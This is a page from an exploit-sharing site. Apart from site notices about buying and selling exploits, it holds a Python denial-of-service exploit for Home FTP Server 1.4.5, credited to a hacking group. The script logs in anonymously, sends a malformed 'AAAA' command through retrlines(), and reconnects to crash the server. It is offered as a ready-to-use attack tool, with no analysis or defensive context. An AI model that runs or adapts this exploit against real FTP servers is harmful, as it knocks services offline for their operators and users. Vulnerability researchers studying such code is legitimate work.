0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Home FTP Server 1.4.5 Remote Denial of Service Exploit
====================================================== Home FTP Server 1.4.5 Remote Denial of Service Exploit ====================================================== # Discovered by 0in from DaRk-CodeRs Programming & Security Group # Contact: 0in(dot)email[at]gmail(dot)com # Thats a very funny bug, and nobody understand how it works;] # When we send a python FTP retrlines() function bad command and create # a new connection server got DoS... o0 # Thats not overflow, it's probubly in logic application. # Greetings to all DaRk-CodeRs Members: # Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89 # Special THX to: Rade0n3900 # Debug: # ---------------------- # | EIP: 0100FE98 | # | DS:[00FFFFED4]=??? | # | ECX: 0100FED4 | # ---------------------- from ftplib import FTP import time ip="127.0.0.1" login="anonymous" passwd = 'gorion@scriptkiddie.pl' print '-------------------------------' print '| HOME FTP SERVER DoS Exploit |' print '| bY 0in From Dark-Coders! |' print '|>>http://dark-coders.4rh.eu<<|' print '-------------------------------' print 'connecting...' ftp=FTP(ip) ftp.login(login,passwd) print 'sending...' try: ftp.retrlines("AAAA") except Exception: print 'ok!\nreconnecting...' ftp=FTP(ip) ftp.quit() print 'DosEd' #EoFF # 0day.today [2024-11-16] #